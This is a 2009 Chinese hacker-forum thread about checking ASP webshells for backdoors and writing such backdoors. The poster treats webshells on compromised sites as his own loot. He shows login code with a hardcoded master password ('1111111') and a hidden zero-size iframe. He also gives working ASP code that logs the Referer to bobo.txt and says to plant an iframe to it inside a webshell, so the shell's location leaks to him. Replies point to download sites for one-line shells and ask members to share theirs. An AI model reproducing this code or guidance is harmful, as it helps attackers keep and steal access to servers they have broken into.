Board logo

标题: 找asp木马后门,写asp木马后门 [打印本页]

作者: yyw258520    时间: 2009-8-2 11:25     标题: 找asp木马后门,写asp木马后门

我等小菜自己写不来asp马,只能用大虾写的,但网上流传的都不知道是几手的了

难免有些居心不良的人会在里面加后门。

好不容易拿到个shell又被别人偷走了怎么甘心啊!

所以在下完asp木马后要先检查有没后门,

通常加了后门的为了隐秘性,都会加密!所以首先我们要先解密 asp木马解密工具

解密后先检查有无万能密码,也就是说就算你改了木马的密码,他也能用这个密码来登录

正常的:

EnD fUNCtION
IF SEssIoN("web2a2dmin")<>UsERpaSs thEn
IF requeSt.FoRM("pass")<>"" TheN
iF REquesT.foRM("pass")=uSERPASS Then
SEsSIoN("web2a2dmin")=uSERPAss
rESPOnsE.rEdirEct Url
ELse
rrs"对不起,密码验证失败!"

加有万能密码的:

EnD fUNCtION
IF SEssIoN("web2a2dmin")<>UsERpaSs thEn
IF requeSt.FoRM("pass")<>"" TheN
iF REquesT.foRM("pass")=uSERPASS or request.form("pass")="1111111" Then
SEsSIoN("web2a2dmin")=uSERPAss
rESPOnsE.rEdirEct Url
ELse
rrs"对不起,密码验证失败!"

1111111就是传说中的万能密码了。

找到万能密码代码后把or request.form("pass")="1111111" 删除就OK了!

下面来找马大多数都喜欢用框架挂马:<iframe src=后门地址 width=0 height=0></iframe>

找到后删了,到此asp后门就算剔除了!


下面教大家后门的原理:

这是一段收信的asp代码将其保存为1.asp

<%url=Request.ServerVariables("HTTP_Referer")
set fs=server.CreateObject("Scripting.FileSystemObject")
set file=fs.OpenTextFile(server.MapPath("bobo.txt"),8,True)
file.writeline url
file.close
set file=nothing
set fs=nothing
%>

代码基本意思就是:“HTTP_REFERER” 链接到当前页面的前一页面的 URL 地址
简单来说就是获得webshell的地址然后记录在bobo.txt这里文本里

上传到空间比如 http://127.0.0.1/1.asp

然后里用

<iframe src=http://127.0.0.1/1.asp width=0 height=0></iframe>

插到asp木马中

那么别人访问这个被挂了马的asp木马就会生成个bobo.txt里面就会有asp大马的路径了

我们学习他是为了更好的理解,大家千万别用来整菜鸟!

还有就是我们论坛的大牛们!谁愿意分享你们的大马,小马,一句话!希望在后面跟帖!我用的都是网上下的!都不清楚还有没有其他后门!自己菜又看不出来
作者: 流淚╮鮭鮭    时间: 2009-8-2 12:55

一句话论坛有,http://3ast.com.cn/tool/

大马的话,你去看看小柔那个教程查有没有后门就行了。。。
作者: yyw258520    时间: 2009-8-2 21:14

呵呵!谢谢!我去找找!
作者: zrz444    时间: 2009-8-3 16:55

很简单的.用抓包工具看一下就行了.
作者: 学徒    时间: 2009-9-18 16:02

看不懂的菜菜学2天HTML就可以看懂了!




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2